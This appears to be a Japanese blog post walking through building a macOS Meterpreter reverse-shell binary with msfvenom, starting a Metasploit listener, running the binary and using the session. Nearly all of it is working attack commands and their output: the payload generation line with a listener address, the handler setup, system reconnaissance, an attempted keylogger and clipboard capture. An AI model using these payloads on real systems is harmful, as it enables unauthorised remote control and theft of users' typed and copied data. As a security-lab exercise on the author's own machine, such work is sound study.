概要
meterpreter ターミナルが使えほうがいろいろ便利なのでやってみました
環境
- macOS 11.7.10
- Metasploit 6.3.60
mach-o ファイルの作成
-
bundle exec msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST=192.168.1.2 -f macho -o /path/to/test.macho
Mac 側待ち受け
msf6 exploit(multi/handler) > use exploit/multi/handler
[*] Using configured payload osx/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set payload osx/x64/meterpreter_reverse_tcp
payload => osx/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.2
LHOST => 192.168.1.2
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.2:4444
mach-o ファイル起動
- chmod +x test.macho
- ./test.macho
動作確認
[*] Meterpreter session 7 opened (192.168.1.2:4444 -> 192.168.1.2:62110) at 2024-03-14 12:46:47 +0900
meterpreter > getuid
Server username: user01
meterpreter > sysinfo
Computer : test.local
OS : macOS Big Sur (macOS 11.7.10)
Architecture : x86
BuildTuple : x86_64-apple-darwin
Meterpreter : x64/osx
meterpreter > keyscan_start
[-] The "keyscan_start" command is not supported by this Meterpreter type (x64/osx)
keyscan_start は使えないようです
クリップボードの取得はできそうです
meterpreter > load extapi
Loading extension extapi...Success.
meterpreter > clipboard_get_data
Text captured at
=================
test.sh
=================
最後に
Mac でリバースシェルの際に meterpreter モードで接続する方法を紹介しました
おそらく shell 方式ではできないので meterpreter を使いたい場合は mach-o ファイルとペイロードを使いましょう
0 件のコメント:
コメントを投稿